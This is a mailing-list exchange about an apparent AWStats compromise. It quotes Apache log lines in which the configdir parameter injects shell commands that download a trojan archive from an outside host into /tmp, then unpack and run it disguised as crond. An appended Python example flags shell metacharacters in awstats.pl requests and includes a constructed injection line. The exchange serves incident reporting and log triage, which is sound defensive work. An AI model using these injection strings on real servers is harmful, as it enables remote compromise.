On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
> > 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
> > r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
> > ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi
> > lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20
> > psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
> > 2500 HTTP/1.1" 200 634 "-" "-"
> >
> >
> > -cs
>
> Thank you for this report.
> So you are saying that even with awstats 6.4 you got compromised as
> Apache did execute the logged command and a trojan then started running
> located in /tmp? If so, would you please be so kind and report that
> issue to the awstats project guys as soon as possible?

Alexander: Could you explain the series of events? It's not clear - to
me - how this resulted in a compromised machine.

BTW, I am MOST appreciative of people who follow-up on their issues as
Chris did. Thanks

--
Total Quality Management - A Commitment to Excellence
Fight Spam: http://www.tqmcube.com/rbldnsd.htm
Real Time Updates: rsync -t \
 tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam]
http://www.tqmcube.com/spam_trap.htm
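
For readers triaging log entries like the ones quoted in this message, here is an added example (not part of the original post, and not AWStats code): Python that percent-decodes the query parameters of awstats.pl requests in an access log and flags shell metacharacters, such as the leading `|` and the `;` separators in the quoted configdir value. The log lines, client addresses and the example.invalid host are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:10:00:00 +0100] "GET /cgi-bin/awstats.pl'
    '?config=www.example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [04/Mar/2005:10:00:05 +0100] "GET /cgi-bin/awstats.pl'
    '?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20'
    'example.invalid%2fx.tgz%3becho%20e_exp%3b%2500 HTTP/1.1" 200 634 "-" "-"',
    '192.0.2.11 - - [04/Mar/2005:10:00:09 +0100] "GET /search?q=a%3bb'
    ' HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Characters with special meaning to a shell, plus NUL.
SHELL_META = re.compile(r'[|;`$&<>\n\x00]')

def suspicious_awstats_requests(lines):
    """Return one finding per awstats.pl parameter containing shell metacharacters."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m['target'])
        if not parts.path.endswith('/awstats.pl'):
            continue
        # parse_qsl decodes once; unquote() again exposes double encoding (%2500).
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = unquote(value)
            hits = sorted(set(SHELL_META.findall(decoded)))
            if hits:
                findings.append({
                    'client': line.split(' ', 1)[0],
                    'param': name,
                    'status': int(m['status']),
                    'decoded': decoded,
                    'meta': hits,
                })
    return findings

if __name__ == '__main__':
    for f in suspicious_awstats_requests(SAMPLE_LOG):
        print(f['client'], f['status'], f['param'], repr(f['decoded']))
```

A 200 status in a finding only shows that the script returned a response; whether the decoded command actually ran has to be established on the host itself, for example from files in /tmp or unexpected processes.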